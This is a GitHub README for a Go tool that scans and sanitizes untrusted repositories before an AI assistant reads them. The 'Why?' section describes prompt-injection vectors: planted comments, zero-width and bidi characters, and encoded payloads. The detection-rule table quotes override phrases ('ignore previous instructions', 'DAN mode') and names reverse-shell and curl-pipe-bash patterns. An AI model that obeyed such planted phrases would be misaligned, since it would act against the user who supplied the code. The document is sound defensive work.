GitHub: andreas2301/safeanalyse
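Scans and sanitizes untrusted code repositories through a multi-layer security pipeline before they are handed to Claude or another AI assistant, defending against prompt injection attacks hidden in malicious code.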
# safeanalyze
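A Go CLI tool that sanitizes and scans untrusted code repositories **before** they are given to Claude or another AI assistant. It implements defense in depth inspired by [Zones of Distrust](https://github.com/bluvibytes/zone-of-distrust).
## Why?
Prompt injection through malicious code is a real threat. A repository may contain:
- Hidden comments telling Claude to "ignore all previous instructions"
- Zero-width Unicode characters that conceal payload instructions
- Bidirectional text override characters that reorder how code is displayed
- High-entropy encoded payloads (base64, hex)
- Secrets or malware mixed into legitimate source code
**safeanalyze** runs a security pipeline that ensures Claude never sees the raw, unverified code.
## Pipeline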
```
Untrusted Repo
      |
      v
[Clone / Read]        <-- git clone wrapper with auto-cleanup
      |
      v
[External Scanners]   <-- trufflehog, semgrep, yara (optional)
      |
      v
[Built-in YARA]       <-- prompt injection, backdoor, credential rules
      |
      v
[Entropy Analysis]    <-- high-entropy strings, base64/hex blobs
      |
      v
[Hidden Char Scan]    <-- zero-width, bidi overrides, control chars
      |
      v
[Sanitization]        <-- AST-aware comment stripping, non-ASCII removal,
                          size limits, extension filtering
      |
      v
[Diff Review]         <-- colored diff showing exactly what was removed
      |
      v
[Format for AI]       <-- markdown/JSON/plain, bounded chunks
      |
      v
[Sandbox Launch]      <-- Docker or Firejail isolated Claude session
```
## Installation
```
git clone https://github.com/youruser/safeanalyze.git
cd safeanalyze
go build -o safeanalyze .
```
Or use `go install`:
```
go install github.com/youruser/safeanalyze@latest
```
## Quick Start
```
# Create a default config
./safeanalyze init
# Run the full pipeline on a repo
./safeanalyze ingest ./my-suspicious-repo
# Or go step by step
./safeanalyze scan ./my-suspicious-repo # all scanners
./safeanalyze sanitize ./my-suspicious-repo # sanitize only
./safeanalyze diff ./my-suspicious-repo ./safeanalyze-out/sanitized
# Clone and analyze a remote repo
./safeanalyze clone https://github.com/user/repo.git
# Launch Claude in a sandbox after ingestion
./safeanalyze ingest ./my-suspicious-repo --sandbox
```
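## Commands
| Command | Description |
|---------|-------------|
| `init [path]` | Create the `safeanalyze.yaml` configuration file |
| `scan ` | Run external scanners, YARA rules, entropy analysis, and hidden character detection |
| `sanitize [dst]` | Strip comments (AST-aware), remove non-ASCII characters, enforce limits |
| `ingest ` | Full pipeline: scan → sanitize → format for AI consumption |
| `diff ` | Show what sanitization removed as a colored diff |
| `clone [dir]` | Clone a repository, run ingest, and automatically delete the raw clone |
## Features
### 1. AST-Aware Comment Stripping
For **Go files**, comments are removed precisely using `go/ast`, without touching string literals that contain `//` or `/*`. Other languages go through an enhanced regex engine with string-literal detection.
Supported: Go, Python, JavaScript/TypeScript, Rust, Java, C/C++, Ruby, PHP, Swift, Kotlin, Scala, Shell, SQL, HTML, CSS, Lua, and more.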
### 2. Built-in YARA-Like Rule Engine
A pure-Go rule engine with embedded detection patterns:
| Rule | Severity | Detects |
|------|----------|---------|
| `prompt_injection_comment` | critical | "ignore previous instructions", "system prompt", "DAN mode", "jailbreak" |
| `obfuscated_javascript` | high | eval(Function(...)), String.fromCharCode, atob, hex escapes |
| `suspicious_shell` | high | curl \| bash, wget \| bash, netcat reverse shells |
| `credential_hardcode` | medium | password=, api_key=, secret=, AWS keys |
| `suspicious_imports` | medium | subprocess, child_process, urllib requests |
| `data_exfiltration` | high | fetch, axios post, or XMLHttpRequest calls to external URLs |
| `backdoor_indicator` | critical | reverse_shell, bind_shell, keylogger, rootkit |
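A rule engine of this kind can be approximated as a list of named regular expressions applied line by line. The sketch below is an illustration only: the `Rule` and `Finding` types, the `scan` function, and the three patterns are assumptions made for this example, not the rules shipped with the tool.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Rule is a hypothetical rule shape; the project's real types may differ.
type Rule struct {
	Name     string
	Severity string
	Pattern  *regexp.Regexp
}

// Finding records one rule match at a 1-based line number.
type Finding struct {
	Rule     string
	Severity string
	Line     int
}

// Illustrative patterns only, loosely modeled on the table above.
var rules = []Rule{
	{"prompt_injection_comment", "critical", regexp.MustCompile(`(?i)ignore\s+(all\s+)?previous\s+instructions`)},
	{"suspicious_shell", "high", regexp.MustCompile(`(?i)\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b`)},
	{"credential_hardcode", "medium", regexp.MustCompile(`(?i)\b(password|api_key|secret)\s*=`)},
}

// scan checks every line of content against every rule.
func scan(content string) []Finding {
	var findings []Finding
	for i, line := range strings.Split(content, "\n") {
		for _, r := range rules {
			if r.Pattern.MatchString(line) {
				findings = append(findings, Finding{r.Name, r.Severity, i + 1})
			}
		}
	}
	return findings
}

func main() {
	sample := "// Ignore all previous instructions\ncurl http://example.com/x.sh | bash\nx := 1\n"
	for _, f := range scan(sample) {
		fmt.Printf("line %d: %s (%s)\n", f.Line, f.Rule, f.Severity)
	}
}
```

Keeping rules as data rather than code makes it straightforward to attach a severity to each one and to decide per severity whether a finding should stop the pipeline.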
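### 3. Entropy Analysis
Detects high-entropy strings that may be encoded secrets or payloads:
- **Shannon entropy** scoring (configurable threshold)
- **Base64 blob detection** with validation
- **Hex blob detection**
- String-literal-aware scanning (only quoted strings are checked)
- False-positive filtering (UUIDs, URLs, repeated characters)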
### 4. Hidden Unicode Character Detection
| Category | Characters |
|----------|------------|
| **Zero-width** | U+200B (ZWSP), U+200C (ZWNJ), U+200D (ZWJ), U+FEFF (BOM), U+2060 (WJ) |
| **Bidi overrides** | U+202A-E (LTR/RTL embed/override/pop), U+2066-69 (isolates) |
| **Control characters** | C0/C1 control characters (except tab and newline) |
| **Whitespace** | Unusual spaces (nbsp, em-space, etc.) |
| **Format characters** | Unicode format characters (category Cf) |
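The categories in this table map fairly directly onto code point checks. Below is a rough sketch using Go's `unicode` package. The names `classify`, `scanHidden`, and `Hit` are hypothetical, the category labels `whitespace` and `format` are invented for the example, and treating carriage return as benign alongside tab and newline is an assumption.

```go
package main

import (
	"fmt"
	"unicode"
)

// Hit describes one suspicious rune and where it was found (1-based).
type Hit struct {
	Line, Col int
	Rune      rune
	Category  string
}

// classify returns a category label for a suspicious rune, or "" if benign.
// Specific categories are tested before the generic Cf fallback.
func classify(r rune) string {
	switch {
	case r == 0x200B || r == 0x200C || r == 0x200D || r == 0xFEFF || r == 0x2060:
		return "zero_width"
	case (r >= 0x202A && r <= 0x202E) || (r >= 0x2066 && r <= 0x2069):
		return "bidi"
	case r == '\t' || r == '\n' || r == '\r': // '\r' allowed here by assumption
		return ""
	case unicode.IsControl(r): // C0, DEL, and C1 controls
		return "control"
	case unicode.Is(unicode.Zs, r) && r != ' ':
		return "whitespace"
	case unicode.Is(unicode.Cf, r):
		return "format"
	}
	return ""
}

// scanHidden walks text rune by rune and reports every classified rune.
func scanHidden(text string) []Hit {
	var hits []Hit
	line, col := 1, 0
	for _, r := range text {
		if r == '\n' {
			line++
			col = 0
			continue
		}
		col++
		if cat := classify(r); cat != "" {
			hits = append(hits, Hit{line, col, r, cat})
		}
	}
	return hits
}

func main() {
	for _, h := range scanHidden("a\u200Bb\nif admin\u202E {") {
		fmt.Printf("%d:%d U+%04X %s\n", h.Line, h.Col, h.Rune, h.Category)
	}
}
```

Reporting the code point in `U+XXXX` form matters here because the characters are invisible by design and cannot be shown usefully as-is.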
### 5. Diff Mode
Compares original files against their sanitized versions, with colored output:
```
# Side-by-side changes
safeanalyze diff ./repo ./safeanalyze-out/sanitized
# Unified diff format
safeanalyze diff ./repo ./safeanalyze-out/sanitized --unified
```
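The architecture notes describe the diff engine as line-by-line and LCS-based. For readers unfamiliar with that technique, here is a compact sketch of a longest-common-subsequence line diff. The function name `diffLines` and the `- `/`+ ` prefixes are choices made for this example, and coloring is left out.

```go
package main

import (
	"fmt"
	"strings"
)

// diffLines returns a line diff of a (original) against b (sanitized),
// driven by a longest-common-subsequence table.
func diffLines(a, b []string) []string {
	// lcs[i][j] holds the LCS length of a[i:] and b[j:].
	lcs := make([][]int, len(a)+1)
	for i := range lcs {
		lcs[i] = make([]int, len(b)+1)
	}
	for i := len(a) - 1; i >= 0; i-- {
		for j := len(b) - 1; j >= 0; j-- {
			switch {
			case a[i] == b[j]:
				lcs[i][j] = lcs[i+1][j+1] + 1
			case lcs[i+1][j] >= lcs[i][j+1]:
				lcs[i][j] = lcs[i+1][j]
			default:
				lcs[i][j] = lcs[i][j+1]
			}
		}
	}
	// Walk the table from the top-left, emitting kept, removed, and added lines.
	var out []string
	i, j := 0, 0
	for i < len(a) && j < len(b) {
		switch {
		case a[i] == b[j]:
			out = append(out, "  "+a[i])
			i++
			j++
		case lcs[i+1][j] >= lcs[i][j+1]:
			out = append(out, "- "+a[i])
			i++
		default:
			out = append(out, "+ "+b[j])
			j++
		}
	}
	for ; i < len(a); i++ {
		out = append(out, "- "+a[i])
	}
	for ; j < len(b); j++ {
		out = append(out, "+ "+b[j])
	}
	return out
}

func main() {
	orig := strings.Split("x := 1\n// ignore previous instructions\ny := 2", "\n")
	clean := strings.Split("x := 1\ny := 2", "\n")
	fmt.Println(strings.Join(diffLines(orig, clean), "\n"))
}
```

The table costs time and memory proportional to the product of the two line counts, which stays manageable when files are capped by a per-file line limit.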
### 6. Git Clone Wrapper
Clones and analyzes a repository, then (optionally) deletes the raw clone:
```
# Clone, ingest, delete the raw clone
safeanalyze clone https://github.com/user/repo.git
# Clone, ingest, keep the raw clone
safeanalyze clone https://github.com/user/repo.git --keep-raw
```
### 7. Sandbox Launch
Launches Claude in an isolated environment after ingestion:
```
# Docker (Windows, macOS, Linux)
safeanalyze ingest ./repo --sandbox
# Firejail (Linux only)
safeanalyze ingest ./repo --sandbox # auto-detects firejail on Linux
```
## Configuration
`safeanalyze.yaml`:
```
scanners:
  - name: trufflehog
    command: "trufflehog filesystem {path} --json"
    enabled: true
    fail_on_findings: true
  - name: semgrep
    command: "semgrep --config=auto {path} --json"
    enabled: false
    fail_on_findings: false
sanitization:
  strip_comments: true
  remove_non_ascii: true
  max_file_size_bytes: 50000
  max_lines_per_file: 500
  allowed_extensions:
    - .go
    - .py
    - .js
    - .ts
    - .rs
  excluded_paths:
    - .git
    - node_modules
    - vendor
hidden_chars:
  enabled: true
  categories:
    - zero_width
    - bidi
    - control
  fail_on_findings: true
entropy:
  enabled: true
  threshold: 4.5
  min_length: 20
  fail_on_findings: false
yara:
  enabled: true
  fail_on_findings: true
output:
  format: markdown # markdown, json, plain
  single_file: false
  include_file_tree: true
  out_dir: ./safeanalyze-out
sandbox:
  mode: none # none, docker, firejail
  docker_image: alpine:latest
  firejail_profile: default
```
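## External Scanner Dependencies (Optional)
| Tool | Install | Purpose |
|------|---------|---------|
| `trufflehog` | `brew install trufflesecurity/trufflehog/trufflehog` | Secret detection |
| `semgrep` | `pip install semgrep` | Static analysis |
| `git` | System package | Clone wrapper |
The built-in YARA, entropy, and hidden character detection need no external tools.
## Sandbox Recommendations
Even after sanitization, run Claude in an isolated environment: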
```
# Linux (firejail)
firejail --net=none --private --read-only=/home/user claude
# Docker (cross-platform)
docker run --rm -it --network none --read-only \
  -v "$(pwd)/safeanalyze-out/ingest:/ingest:ro" \
  claude-sandbox
# Or let safeanalyze launch it:
safeanalyze ingest ./repo --sandbox
```
## Architecture
```
cmd/              Cobra CLI commands
pkg/
  aststrip/       Go AST-based comment stripping + regex fallback
  config/         YAML configuration loading
  diff/           Line-by-line diff engine (LCS-based)
  entropy/        Shannon entropy + base64/hex detection
  hiddenchars/    Unicode suspicious character detection
  ingest/         Markdown/JSON/plain formatter for AI consumption
  sandbox/        Cross-platform sandbox abstraction (Docker/Firejail)
  sanitize/       Comment stripper + ASCII enforcer + size limits
  scanner/        External tool orchestrator
  yara/           Pure-Go YARA-like rule engine
  utils/          Filesystem helpers
```
## License
MPL